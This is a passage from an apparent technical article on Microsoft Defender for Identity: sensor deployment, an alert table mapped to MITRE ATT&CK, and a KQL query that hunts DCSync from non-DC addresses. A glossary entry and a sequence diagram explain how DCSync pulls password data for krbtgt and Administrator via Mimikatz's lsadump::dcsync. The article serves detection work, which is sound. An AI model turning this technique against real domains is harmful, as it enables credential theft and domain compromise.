The breakthrough was not better detection algorithms. The breakthrough was moving the analytics off the DC entirely, so the per-principal baselines could accumulate centrally and the detection set could ship on a cloud cadence instead of an on-prem one. That decision is why MDI shipped DCShadow detection within five months of disclosure -- a cadence the on-prem product could not have matched.
&lt;p&gt;That is the move that turned a wire-side parse into a sustained detection program. The proof is the DCShadow timeline: five months from disclosure to detection, on a cadence the on-prem product could not have matched. Now we can ask the question every reader of the offensive-AD corpus actually wants answered. What does the watcher catch in 2026?&lt;/p&gt;
&lt;h2&gt;6. MDI in 2026 -- Sensors, Alerts, KQL, and the Graph in Transition&lt;/h2&gt;
&lt;p&gt;This is the article&apos;s bookmarking section. Four parts: what is on the DC, what alerts fire, what KQL the operator writes when the alerts miss, and where the graph layer that began as ATA 1.9&apos;s Lateral Movement Paths report actually lives in 2026.&lt;/p&gt;
&lt;h3&gt;6.1 Sensor topology in 2026&lt;/h3&gt;
&lt;p&gt;What is on a Windows Server 2022 (or 2025) domain controller running MDI in May 2026? Two sensor families, two target-server matrices, and a workspace cap.&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;v2.x sensor&lt;/strong&gt; is the legacy standalone agent: supported on Windows Server 2016 and earlier domain controllers, and on AD FS, AD CS issuing certificate authorities, and Microsoft Entra Connect servers that are not themselves domain controllers, per the v2.x prerequisites page [@mslearn-mdi-prereq-sensor-v2]. v2.x carries its own installer, its own update cadence, and its own packet capture stack (NPCap). It also requires a &lt;em&gt;Directory Service Account&lt;/em&gt; (DSA) -- a gMSA configured during install whose forest-wide read rights let the sensor enumerate AD objects.&lt;/p&gt;

A group Managed Service Account configured during MDI v2.x sensor installation, granted forest-wide read permissions on Active Directory objects so the sensor can resolve principal identities, enumerate group memberships, and read schema attributes that the wire-side parse refers to by SID. The v3.x sensor replaces the DSA pattern with LocalSystem impersonation -- the sensor impersonates the local-system account of the domain controller it runs on, which has equivalent on-DC read rights without needing a separate gMSA per tenant [@mslearn-mdi-deploy-sensor-v3][@mslearn-mdi-action-accounts].
&lt;p&gt;The &lt;strong&gt;v3.x sensor&lt;/strong&gt; is the current path. It requires Windows Server 2019 or later with the March 2026 (or later) cumulative update installed, the Defender for Endpoint agent already deployed and onboarded, and -- critically -- there is no separate MDI installer at all. The MDI sensor capability ships as an extension of the MDE SENSE service. Self-imposed resource caps: &lt;strong&gt;CPU at most 30% of the host DC&apos;s CPU, memory at most 1.5 GB&lt;/strong&gt;, with explicit Hyper-V Dynamic Memory and VMware reservation guidance that ensures the cap is honoured under contention [@mslearn-mdi-deploy-sensor-v3]. v3.x uses LocalSystem impersonation for AD reads rather than a gMSA-based DSA. The May 2026 release notes added direct v3.x support for AD FS, AD CS, and Microsoft Entra Connect identity roles &lt;em&gt;when those roles run on a domain controller&lt;/em&gt; (which is the recommended deployment pattern for most mid-sized tenants) [@mslearn-mdi-whats-new].The 30% CPU cap is honoured by the MDE SENSE service&apos;s scheduling, but Hyper-V Dynamic Memory and VMware ballooning can break the assumption -- if the hypervisor reclaims memory under contention the sensor cannot get its 1.5 GB and the local capture buffer drops events. Microsoft&apos;s deployment guide recommends a static memory reservation on virtualised DCs for that reason.&lt;/p&gt;
&lt;p&gt;The four target server roles are domain controllers (every DC, including RODCs), AD FS federation servers (not Web Application Proxies), AD CS online issuing certificate authorities (not offline root CAs), and Microsoft Entra Connect servers (both active and staging). The May 2026 release notes also raised the per-workspace capacity ceiling from 350 sensors to &lt;strong&gt;1,000 sensors per workspace&lt;/strong&gt; [@mslearn-mdi-whats-new].&lt;/p&gt;

flowchart TD
    DC1[&quot;Domain Controller&lt;br /&gt;(WS2019+, v3.x sensor&lt;br /&gt;inside MDE SENSE)&quot;]
    DC2[&quot;Domain Controller&lt;br /&gt;(WS2016, v2.x sensor)&quot;]
    ADFS[&quot;AD FS server&lt;br /&gt;(v2.x sensor, non-DC)&quot;]
    ADCS[&quot;AD CS issuing CA&lt;br /&gt;(v2.x or v3.x sensor)&quot;]
    EC[&quot;Entra Connect server&lt;br /&gt;(v2.x sensor)&quot;]
    CLOUD[&quot;MDI cloud backend&lt;br /&gt;(multi-tenant analytics,&lt;br /&gt;per-principal baselines)&quot;]
    XDR[&quot;Microsoft Defender XDR&lt;br /&gt;(security.microsoft.com)&lt;br /&gt;Identity tables + alerts&quot;]
    DC1 --&amp;gt; CLOUD
    DC2 --&amp;gt; CLOUD
    ADFS --&amp;gt; CLOUD
    ADCS --&amp;gt; CLOUD
    EC --&amp;gt; CLOUD
    CLOUD --&amp;gt; XDR
&lt;p&gt;The deployment matrix below is the operator-grade reference -- which role gets which sensor, which audit subcategories the sensor depends on, and what posture data the role unlocks.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Server role&lt;/th&gt;
&lt;th&gt;Sensor version&lt;/th&gt;
&lt;th&gt;Required audit subcategories&lt;/th&gt;
&lt;th&gt;Posture coverage unlocked&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Domain controller (WS 2019+)&lt;/td&gt;
&lt;td&gt;v3.x (preferred)&lt;/td&gt;
&lt;td&gt;Credential Validation; Kerberos AS; Kerberos TGS; Logon; DS Access; Computer Account Mgmt&lt;/td&gt;
&lt;td&gt;Full Identity Security Posture (entity hygiene, dormant accounts, weak crypto)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Domain controller (WS 2016)&lt;/td&gt;
&lt;td&gt;v2.x&lt;/td&gt;
&lt;td&gt;Same as above&lt;/td&gt;
&lt;td&gt;Same as above, minus v3.x-only enhancements&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AD FS federation server&lt;/td&gt;
&lt;td&gt;v2.x (or v3.x if also a DC)&lt;/td&gt;
&lt;td&gt;AD FS audit logs (Application + Security)&lt;/td&gt;
&lt;td&gt;Hybrid auth signal (Entra ID + on-prem)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AD CS issuing CA&lt;/td&gt;
&lt;td&gt;v2.x (or v3.x if also a DC)&lt;/td&gt;
&lt;td&gt;AD CS audit logs (certificate request and template events)&lt;/td&gt;
&lt;td&gt;Nine ESC posture assessments (ESC1-Preview, ESC2, ESC3, ESC4, ESC6-Preview, ESC7, ESC8, ESC11, ESC15) [@mslearn-mdi-certificates-posture]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Entra Connect server&lt;/td&gt;
&lt;td&gt;v2.x (or v3.x if also a DC)&lt;/td&gt;
&lt;td&gt;Sync engine event log&lt;/td&gt;
&lt;td&gt;Sync-engine attribute-flow signal&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; For new DC deployments on Windows Server 2019 or later, use &lt;strong&gt;v3.x&lt;/strong&gt;: no separate installer, no gMSA, no NPCap, and the sensor ships its updates with the MDE agent. For AD FS, AD CS, or Entra Connect roles that run on dedicated Windows Server 2016 hosts, &lt;strong&gt;v2.x&lt;/strong&gt; is the supported path until those hosts are upgraded. Mixed environments are normal during the migration window; the cloud backend handles both versions without operator intervention [@modernsec-v3x][@jeffreyappel-v2v3]. &lt;strong&gt;One known limitation as of May 2026&lt;/strong&gt;: Windows Server 2025 domain controllers that currently run a v2.x sensor cannot be migrated to v3.x; Microsoft&apos;s What&apos;s New page is explicit that &quot;migration of domain controllers with Windows Server 2025 from sensor v2.x to sensor v3.x is not supported&quot; and the operator should continue on v2.x on those hosts until migration support ships [@mslearn-mdi-whats-new].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Sensor topology determines coverage. Coverage determines which alerts can fire.&lt;/p&gt;
&lt;h3&gt;6.2 The alert taxonomy mapped to MITRE ATT&amp;amp;CK&lt;/h3&gt;
&lt;p&gt;Every offensive Active Directory primitive a reader of the SpecterOps, Mimikatz, and Certipy corpus knows has a row in MDI&apos;s alert catalogue. The catalogue is the article&apos;s bookmarkable artifact, and the table below is the load-bearing data-density object. Four MITRE-aligned categories, the named alert for each primitive, and the ATT&amp;amp;CK technique ID the alert maps to.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Category&lt;/th&gt;
&lt;th&gt;MDI alert (External ID / detector)&lt;/th&gt;
&lt;th&gt;MITRE ATT&amp;amp;CK technique&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Reconnaissance&lt;/td&gt;
&lt;td&gt;Account enumeration reconnaissance (LDAP) -- External ID 2437&lt;/td&gt;
&lt;td&gt;T1087 Account Discovery&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reconnaissance&lt;/td&gt;
&lt;td&gt;Network-mapping reconnaissance (DNS)&lt;/td&gt;
&lt;td&gt;T1018 Remote System Discovery&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reconnaissance&lt;/td&gt;
&lt;td&gt;Security principal reconnaissance (LDAP)&lt;/td&gt;
&lt;td&gt;T1069 Permission Groups Discovery&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reconnaissance&lt;/td&gt;
&lt;td&gt;User and IP address reconnaissance (SMB)&lt;/td&gt;
&lt;td&gt;T1018&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistence and privilege escalation&lt;/td&gt;
&lt;td&gt;Honeytoken activity (authentication / attribute / group)&lt;/td&gt;
&lt;td&gt;T1098 Account Manipulation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistence and privilege escalation&lt;/td&gt;
&lt;td&gt;Suspected Skeleton Key attack&lt;/td&gt;
&lt;td&gt;T1556 (Modify Authentication Process)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistence and privilege escalation&lt;/td&gt;
&lt;td&gt;Suspected Golden Ticket usage (encryption downgrade)&lt;/td&gt;
&lt;td&gt;T1558.001 Golden Ticket [@mitre-t1558-001]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistence and privilege escalation&lt;/td&gt;
&lt;td&gt;Suspected Golden Ticket usage (forged authorization data)&lt;/td&gt;
&lt;td&gt;T1558.001&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistence and privilege escalation&lt;/td&gt;
&lt;td&gt;Suspected DCShadow attack (DC promotion) -- External ID 2028&lt;/td&gt;
&lt;td&gt;T1207 Rogue Domain Controller [@mitre-t1207]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistence and privilege escalation&lt;/td&gt;
&lt;td&gt;Suspected DCShadow attack (DC replication request) -- External ID 2029&lt;/td&gt;
&lt;td&gt;T1207&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistence and privilege escalation&lt;/td&gt;
&lt;td&gt;Suspicious additions to sensitive groups&lt;/td&gt;
&lt;td&gt;T1098 Account Manipulation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential access&lt;/td&gt;
&lt;td&gt;Suspected DCSync attack (replication of directory services) -- External ID 2006&lt;/td&gt;
&lt;td&gt;T1003.006 DCSync [@mitre-t1003-006]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential access&lt;/td&gt;
&lt;td&gt;Suspected Brute Force attack (Kerberos, NTLM)&lt;/td&gt;
&lt;td&gt;T1110 Brute Force&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential access&lt;/td&gt;
&lt;td&gt;Suspected AS-REP Roasting attack&lt;/td&gt;
&lt;td&gt;T1558.004 AS-REP Roasting [@mitre-t1558-004]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential access&lt;/td&gt;
&lt;td&gt;Suspected Kerberos SPN exposure / Kerberoasting&lt;/td&gt;
&lt;td&gt;T1558.003 Kerberoasting [@mitre-t1558-003]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential access&lt;/td&gt;
&lt;td&gt;Suspected over-pass-the-hash attack&lt;/td&gt;
&lt;td&gt;T1550.002 Pass the Hash&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lateral movement&lt;/td&gt;
&lt;td&gt;Suspected identity theft (pass-the-hash)&lt;/td&gt;
&lt;td&gt;T1550.002&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lateral movement&lt;/td&gt;
&lt;td&gt;Suspected identity theft (pass-the-ticket)&lt;/td&gt;
&lt;td&gt;T1550.003 Pass the Ticket&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lateral movement&lt;/td&gt;
&lt;td&gt;Remote code execution attempt&lt;/td&gt;
&lt;td&gt;T1021 Remote Services&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lateral movement&lt;/td&gt;
&lt;td&gt;Suspected NTLM relay attack (the ESC8 class)&lt;/td&gt;
&lt;td&gt;T1187 Forced Authentication&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lateral movement&lt;/td&gt;
&lt;td&gt;Suspected NTLM authentication tampering&lt;/td&gt;
&lt;td&gt;T1557.001 LLMNR / NBT-NS / Man-in-the-Middle&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Both alert documentation surfaces -- the classic-format alert reference and the XDR-format alert reference -- are the canonical primaries for this catalogue [@mslearn-mdi-alerts-mdi-classic][@mslearn-mdi-alerts-xdr]. Reading either page in sequence is the single most useful afternoon a SOC operator new to MDI can spend.The numeric External IDs (2006 for DCSync, 2028 and 2029 for DCShadow, 2437 for LDAP account enumeration, and so on) are a Microsoft-internal stability anchor that survives alert-name renames over time. Microsoft has renamed alerts -- &quot;Suspected DCSync attack&quot; was named differently in early Azure ATP -- but the External IDs do not change. Production SOAR rules should match on the External ID, not the alert name string.&lt;/p&gt;

An offensive primitive in which a principal that has been granted the *Replicating Directory Changes* and *Replicating Directory Changes All* extended rights uses the DRSUAPI replication interface (specifically `IDL_DRSGetNCChanges`) to request a full or partial replication of directory contents from a domain controller -- typically targeting the `unicodePwd` attribute on sensitive accounts like `krbtgt` and `Administrator`. The technique requires no code execution on the DC, no `Ntds.dit` copy, and no presence on a domain-joined machine other than network connectivity to a DC. Mimikatz&apos;s `lsadump::dcsync` command, written by Benjamin Delpy and Vincent Le Toux, is the canonical implementation; MITRE catalogues the technique as T1003.006 [@mitre-t1003-006][@adsec-dcsync].

A specific adversary behaviour catalogued in the MITRE ATT&amp;amp;CK framework, identified by a stable ID (for example T1003.006 for DCSync, T1558.001 for Golden Ticket, T1207 for Rogue Domain Controller). MITRE updates the framework periodically; the IDs themselves do not change, which is why detection-engineering tooling -- including MDI&apos;s per-alert MITRE mapping -- anchors to the IDs rather than the human-readable names.
&lt;p&gt;Concrete mechanism, for one named alert. &lt;em&gt;Suspected DCSync attack -- replication of directory services&lt;/em&gt;, External ID 2006, fires on the structural pattern that an &lt;code&gt;IDL_DRSGetNCChanges&lt;/code&gt; request reached a domain controller from a source that is not itself a domain controller. The mechanism is the one place where MDI&apos;s wire-side capture pays for itself most visibly -- the 4662 event the LSA emits records the directory-service-object access but does not identify the source as not-a-DC; only the wire view sees the calling host&apos;s IP and resolves it against the directory&apos;s &lt;code&gt;serverReference&lt;/code&gt; set.&lt;/p&gt;

sequenceDiagram
    autonumber
    participant Attacker as Attacker workstation (Mimikatz)
    participant DC as Domain Controller
    participant MDI as MDI v3.x sensor (on DC)
    participant Cloud as MDI cloud backend
    participant XDR as Defender XDR portal
    Attacker-&amp;gt;&amp;gt;DC: IDL_DRSGetNCChanges (DRSUAPI replication request)
    DC-&amp;gt;&amp;gt;DC: LSA writes event 4662 (DS object access)
    DC--&amp;gt;&amp;gt;Attacker: Replication response (unicodePwd, supplementalCredentials)
    MDI-&amp;gt;&amp;gt;MDI: Wire parse: caller IP not in serverReference set
    MDI-&amp;gt;&amp;gt;Cloud: Stream parsed event (caller, target object, attributes)
    Cloud-&amp;gt;&amp;gt;Cloud: Correlate against known-DC IPs, fire detector
    Cloud-&amp;gt;&amp;gt;XDR: Write alert External ID 2006 (T1003.006)
    XDR-&amp;gt;&amp;gt;XDR: Surface in unified incident queue
&lt;p&gt;The alert taxonomy makes the bookmarkable promise the rest of the article rests on. The trigger logic that fires each row, however, depends on signal the sensor can only acquire on the wire or in the event log -- and when the trigger logic misses, the operator&apos;s last-mile coverage is KQL.&lt;/p&gt;
&lt;h3&gt;6.3 The advanced-hunting schema and a worked KQL example&lt;/h3&gt;
&lt;p&gt;When the alert template misses, the hunter writes Kusto Query Language. Defender XDR exposes three identity-specific tables that the MDI sensor populates -- &lt;code&gt;IdentityLogonEvents&lt;/code&gt; for authentication activity captured against on-prem AD, &lt;code&gt;IdentityQueryEvents&lt;/code&gt; for queries performed against AD objects, and &lt;code&gt;IdentityDirectoryEvents&lt;/code&gt; for events involving an on-prem domain controller including password changes, expirations, UPN changes, scheduled tasks, and PowerShell activity [@mslearn-xdr-identitylogon][@mslearn-xdr-identityquery][@mslearn-xdr-identitydirectory]. Cross-product context is available from the unified &lt;code&gt;AlertInfo&lt;/code&gt;, &lt;code&gt;AlertEvidence&lt;/code&gt;, and &lt;code&gt;DeviceLogonEvents&lt;/code&gt; tables.&lt;/p&gt;
&lt;p&gt;The worked example below is the structural DCSync detector that catches the encrypted-channel case the alert can miss. The runner in this environment cannot execute KQL directly, so the block is annotated rather than runnable -- a non-runnable KQL detector is stronger pedagogy here than a hand-rolled Python simulation, because the query as written is exactly what an operator would paste into the Defender XDR advanced-hunting console against the actual &lt;code&gt;IdentityDirectoryEvents&lt;/code&gt; table.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-kql&quot;&gt;// Structural DCSync detector -- DRSUAPI from non-DC IPs
// Run against the Defender XDR advanced-hunting IdentityDirectoryEvents table.
IdentityDirectoryEvents
| where Timestamp &amp;gt; ago(24h)                                  // tune window per triage cadence
| where ActionType == &quot;DRSReplicate&quot;                          // the DRSUAPI replication call
| extend SourceIP = tostring(parse_json(AdditionalFields).SourceIPAddress)
| where SourceIP !in (&quot;10.0.1.10&quot;, &quot;10.0.1.11&quot;, &quot;10.0.1.12&quot;)  // tenant DC IPs go here
| where AccountName !startswith &quot;MSOL_&quot;                       // Entra Connect Cloud Sync FP class
| where AccountName !in (&quot;ADConnectSync&quot;)                     // Entra Connect on-prem FP class
| project Timestamp, AccountName, SourceIP, TargetDeviceName, AdditionalFields
| order by Timestamp desc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The output rows that survive the filters are the operator&apos;s investigation queue: DRSUAPI replication requests against a DC from a source that is not itself a DC, and not a recognised hybrid-identity sync principal. The two cleanup principals -- &lt;code&gt;MSOL_*&lt;/code&gt; (the Microsoft Entra Connect Cloud Sync service account, with a stable &lt;code&gt;MSOL_&lt;/code&gt; prefix and an 8-character random suffix) and &lt;code&gt;ADConnectSync&lt;/code&gt; (the on-prem Entra Connect service account) -- are the two most common false positives every MDI tenant sees. Adding them to the &lt;code&gt;!startswith&lt;/code&gt; and &lt;code&gt;!in&lt;/code&gt; clauses cuts the FP rate by an order of magnitude in most environments. The third FP class that operators tune for is &lt;strong&gt;legitimate vulnerability scanners&lt;/strong&gt; triggering the LDAP / SMB reconnaissance alerts -- the scanner&apos;s authenticated enumeration looks behaviourally identical to a SharpHound collector unless the scanner&apos;s source IP is in an allowlist.&lt;/p&gt;

flowchart LR
    A[&quot;IdentityDirectoryEvents&lt;br /&gt;(DRSReplicate)&quot;] --&amp;gt; B[&quot;Filter: source IP&lt;br /&gt;not in known_dc_ips&quot;]
    B --&amp;gt; C[&quot;Filter: account&lt;br /&gt;not in sync allowlist&quot;]
    C --&amp;gt; D[&quot;Suspect rows&lt;br /&gt;(operator triage)&quot;]
&lt;p&gt;Beyond the three identity tables there is one more surface worth naming. The April 2026 &lt;em&gt;Identity Explorer&lt;/em&gt; Preview in the Defender XDR Identity page builds on the Microsoft Sentinel data lake -- Microsoft&apos;s 2026 cross-product cold-storage and analytics layer with up to 12 years of retention in Parquet format [@mslearn-sentinel-datalake][@mslearn-mdi-whats-new]. Identity Explorer uses the Defender XDR hunting graph to visualise identity attack paths as interactive graphs with predefined scenarios for lateral movement, privilege escalation, and credential-access risk [@mslearn-xdr-hunting-graph][@mslearn-xdr-investigate-users].&lt;/p&gt;
&lt;p&gt;The query language is the operator&apos;s last-mile coverage layer. Everything in section 6 so far is what MDI gives you. KQL is what you do when MDI does not.&lt;/p&gt;
&lt;h3&gt;6.4 The graph layer in transition&lt;/h3&gt;
&lt;p&gt;The graph that began as ATA 1.9&apos;s Lateral Movement Paths report no longer exists in the form most operators remember. The history is a clean three-step arc and a transition still in progress.&lt;/p&gt;
&lt;p&gt;ATA 1.9 (March 2018) shipped the &lt;em&gt;Lateral movement paths to sensitive accounts&lt;/em&gt; report, built on SAM-R-based local-administrator discovery: the sensor remotely enumerated each member host&apos;s local-administrators group and computed the chain of &quot;who can become whom&quot; through cached credentials [@mslearn-ata-1-9][@atadocs-lmp-usecase]. That report carried through Azure ATP, through the Microsoft Defender for Identity rename, and through the Microsoft Defender XDR rebrand essentially unchanged for seven years.&lt;/p&gt;
&lt;p&gt;In May 2025, Microsoft disabled the SAM-R-based discovery via Message Center notice MC1073068, citing alignment with the broader &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;Windows NTLM-deprecation roadmap&lt;/a&gt; [@handsontek-mc1073068]. The message body is explicit: &lt;em&gt;&quot;Disabling this feature will impact the ability to map potential lateral movement paths (using SAM-R queries) because the data used to calculate potential lateral movement paths will no longer be collected by the Defender for Identity sensor.&quot;&lt;/em&gt; SAM-R as a remote-discovery primitive had become a security debt as much as a feature; the deprecation brought MDI&apos;s collection behaviour into line with Restricted SAM and Microsoft&apos;s NTLM-deprecation posture, but it left the LMP surface without its primary data source.&lt;/p&gt;
&lt;p&gt;The replacement is in two pieces. The first is the unified &lt;strong&gt;attack-path exploration&lt;/strong&gt; surface in Microsoft Defender XDR, driven primarily by Microsoft Defender for Cloud&apos;s Cloud Security Posture Management (CSPM) attack-path engine [@mslearn-defenderforcloud-attack-path], with MDI feeding identity signal into the same correlation. The second is the &lt;strong&gt;Identity Explorer&lt;/strong&gt; Preview that launched in April 2026 on the Microsoft Sentinel data lake, specifically for identity attack paths -- visible from the Identity page in Defender XDR for tenants with a Sentinel data lake licence [@mslearn-mdi-whats-new][@mslearn-xdr-hunting-graph][@mslearn-xdr-investigate-users]. The honest framing in 2026 is that the post-SAM-R LMP coverage is &lt;strong&gt;not yet fully closed&lt;/strong&gt; by either replacement -- the Defender XDR hunting graph is rich, the Identity Explorer is improving, but the seven-year-old SAM-R-derived LMP report had operator workflows around it that the new surfaces have not all reproduced.&lt;/p&gt;
&lt;p&gt;MDI&apos;s graph layer is in transition. The cloud rewrite handed Microsoft the platform to ship a better graph than ATA ever could; in 2026 the build-out is still in progress. Section 9 will name this as one of the article&apos;s open problems. First, though, we have to look at the competitive market the watcher sits inside.&lt;/p&gt;
&lt;h2&gt;7. Competing Approaches -- the 2026 Identity-Detection Market&lt;/h2&gt;
&lt;p&gt;If MDI is the watcher on the DC, what is everybody else? Five named methods share the 2026 identity-threat detection market with MDI, each optimising for a different trade-off. The table below is the six-column shorthand; the prose that follows is the per-method analysis.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Vendor / project&lt;/th&gt;
&lt;th&gt;On-DC sensor model&lt;/th&gt;
&lt;th&gt;Data-input mix&lt;/th&gt;
&lt;th&gt;Alert taxonomy&lt;/th&gt;
&lt;th&gt;Graph model&lt;/th&gt;
&lt;th&gt;Pricing model&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;MDI&lt;/td&gt;
&lt;td&gt;On-DC sensor (v2.x standalone or v3.x MDE-integrated)&lt;/td&gt;
&lt;td&gt;Wire + event log + ETW + AD CS audit&lt;/td&gt;
&lt;td&gt;MITRE-aligned alert catalogue + nine ESC posture&lt;/td&gt;
&lt;td&gt;Hunting graph + Identity Explorer Preview&lt;/td&gt;
&lt;td&gt;Bundled with M365 E5 / E5 Security / F5 Security&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CrowdStrike Falcon Identity Protection&lt;/td&gt;
&lt;td&gt;Connector on/near DC + endpoint agent&lt;/td&gt;
&lt;td&gt;Wire (via connector) + endpoint telemetry&lt;/td&gt;
&lt;td&gt;ITDR-style alerts, less granular ATT&amp;amp;CK mapping&lt;/td&gt;
&lt;td&gt;Identity attack-path view (inline enforcement)&lt;/td&gt;
&lt;td&gt;Falcon ITDR module add-on&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Semperis DSP + ADFR&lt;/td&gt;
&lt;td&gt;Off-DC change-tracking agent&lt;/td&gt;
&lt;td&gt;AD object-change events (LDAP / replication)&lt;/td&gt;
&lt;td&gt;IoC and IoE runtime alerts plus drift / tamper alerts&lt;/td&gt;
&lt;td&gt;Tier 0 exposure graph + rollback graph&lt;/td&gt;
&lt;td&gt;Standalone licence per AD object&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SpecterOps BloodHound Enterprise&lt;/td&gt;
&lt;td&gt;Off-DC collector (SharpHound CE)&lt;/td&gt;
&lt;td&gt;AD permissions graph + Azure / Okta / Mac extensions&lt;/td&gt;
&lt;td&gt;Attack-path exposure findings&lt;/td&gt;
&lt;td&gt;Pure graph (Cypher over Postgres / Neo4j)&lt;/td&gt;
&lt;td&gt;Standalone SaaS licence&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft Sentinel native UEBA&lt;/td&gt;
&lt;td&gt;None on DC (consumes MDI + other sources)&lt;/td&gt;
&lt;td&gt;Sentinel data lake (cross-product)&lt;/td&gt;
&lt;td&gt;UEBA risk scores, anomaly events&lt;/td&gt;
&lt;td&gt;None on identity graph directly&lt;/td&gt;
&lt;td&gt;Sentinel ingestion + UEBA add-on&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sigma + SIEM (open source)&lt;/td&gt;
&lt;td&gt;None on DC (event forwarder agents)&lt;/td&gt;
&lt;td&gt;Windows event logs, ETW via OSQuery / Velociraptor&lt;/td&gt;
&lt;td&gt;Custom rule library&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Free (rule library); SIEM cost separate&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;CrowdStrike Falcon Identity Protection&lt;/strong&gt; is the post-acquisition rename of &lt;em&gt;Preempt Platform&lt;/em&gt;, the product line CrowdStrike bought when it completed the &lt;strong&gt;Preempt Security acquisition on September 30, 2020&lt;/strong&gt; [@businesswire-cs-preempt]. Architecturally distinct from MDI: rather than relying on an on-DC sensor that parses wire traffic and event logs, Falcon Identity Protection inspects authentication traffic via a connector deployed on or near each DC and correlates it with Falcon-agent telemetry already collected from every protected endpoint. Identity-policy enforcement is &lt;em&gt;inline&lt;/em&gt; -- the product can require an MFA challenge or block an authentication at the point of decision rather than emit a post-hoc alert [@crowdstrike-falcon-id]. This is the only commercial product in the survey that does inline enforcement on AD Kerberos and NTLM authentications; it is also the only one that is not bundled with a Microsoft 365 licence.&lt;/p&gt;

The product category that combines runtime detection of identity-targeted attacks (Kerberos forgery, credential theft, lateral movement) with response capabilities (force MFA, disable user, revoke session). Gartner formalised the term in 2022. CrowdStrike Falcon Identity Protection and SentinelOne Singularity Identity are the largest ITDR-positioned products outside the Microsoft stack; MDI plus the Defender XDR remediation actions surface effectively functions as Microsoft&apos;s ITDR offering for tenants already inside the Microsoft 365 estate [@mslearn-mdi-remediation-actions].
&lt;p&gt;&lt;strong&gt;Semperis Directory Services Protector (DSP)&lt;/strong&gt; and the companion &lt;strong&gt;Active Directory Forest Recovery (ADFR)&lt;/strong&gt; product are best known for change-tracking and recovery, layered over a runtime Indicators-of-Compromise and Indicators-of-Exposure detection set that overlaps with MDI&apos;s alert taxonomy on classes like DCSync, DCShadow, and Golden Ticket replay [@semperis-dsp][@semperis-adfr]. DSP tracks AD object changes in near-real-time, fires IoC and IoE alerts on the same primitives MDI watches, and offers post-attack rollback as its primary differentiator; ADFR handles malware-free forest recovery in minutes-to-hours rather than days-to-weeks. The pair is partly complementary, partly overlapping with MDI: DSP catches the post-attack drift (the unauthorised group membership change, the rogue ACL) and offers a rollback path MDI does not have; MDI&apos;s per-principal behavioural baselines and unified Defender XDR incident queue are the differentiator on the in-flight detection axis; ADFR handles &quot;the worst day of your career&quot; forest-recovery scenarios where rebuilding the directory is the only remediation. Many tenants run all three.&lt;/p&gt;
